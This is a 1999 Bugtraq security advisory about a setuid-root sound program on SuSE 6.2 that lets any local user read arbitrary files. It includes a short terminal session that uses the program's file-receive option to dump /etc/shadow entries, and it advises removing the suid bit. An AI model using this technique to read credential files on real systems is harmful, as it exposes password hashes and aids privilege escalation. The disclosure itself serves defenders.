Date: Thu, 16 Sep 1999 19:28:02 -0500
From: Brock Tellier <btellier@WEBLEY.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: SuSE 6.2 /usr/bin/sccw read any file
Greetings,
/usr/bin/sccw, suid root by default on SuSE 6.2, allows any user to
read any file on the system. Sort of. Well, it's enough to read the
text of almost anything. In capitals. Without punctuation. Check it
out:
xnec@susebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnec@susebox:/tmp > sccw
Soundcard CW for Linux v1.1 Steven J. Merrifield, VK3ESM
1. Set the speed, currently = 10
2. Set the frequency, currently = 700
3. Set the volume, currently = 32
4. Set the delay value, currently = 3
5. Set the character set for random groups, currently = 1
6. Set the number of groups, currently = 5
7. Receive random character groups.
8. Receive a file.
9. QUIT
Enter your choice : 8
Enter filename : /etc/shadow
ROOTFGPZNZWZ5GWRG10850010000
BIN8902010000
DAEMON8902010000
... etc.
The printing of these lines takes a few seconds each, so be patient.
While you're waiting, remove the suid-bit.
Of course, getting the /etc/shadow file in all caps isn't instant root,
but it's a start for someone out there. Besides, he can still read your
mail in all caps, without punctuation.
Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com
